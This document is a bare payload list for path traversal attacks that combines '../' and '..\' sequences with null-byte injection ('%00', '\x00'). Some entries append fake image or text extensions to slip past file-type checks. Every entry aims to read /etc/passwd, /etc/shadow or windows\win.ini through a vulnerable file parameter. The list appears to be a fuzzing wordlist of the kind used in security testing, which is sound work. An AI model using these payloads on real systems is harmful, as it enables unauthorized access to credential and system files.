../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../../etc/passwd%00.jpg
../../../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
../../../../etc/passwd%00.png
../../../etc/passwd%00.txt
../../../../etc/passwd%00.txt
../../../etc/shadow%00
../../../../etc/shadow%00
../../../etc/shadow%00.jpg
..\..\..\..\windows\win.ini%00
..\..\..\..\..\windows\win.ini%00
..\..\..\..\windows\win.ini%00.jpg
..\..\..\..\..\windows\win.ini%00.jpg
/etc/passwd%00
/etc/passwd%00.jpg
/etc/passwd%00.png
/etc/passwd%00.txt
/etc/passwd%00.gif
/etc/shadow%00
/etc/shadow%00.jpg
C:\windows\win.ini%00
C:\windows\win.ini%00.jpg
../../../etc/passwd\x00
../../../../etc/passwd\x00
../../../etc/passwd\x00.jpg
../../../../etc/passwd\x00.jpg
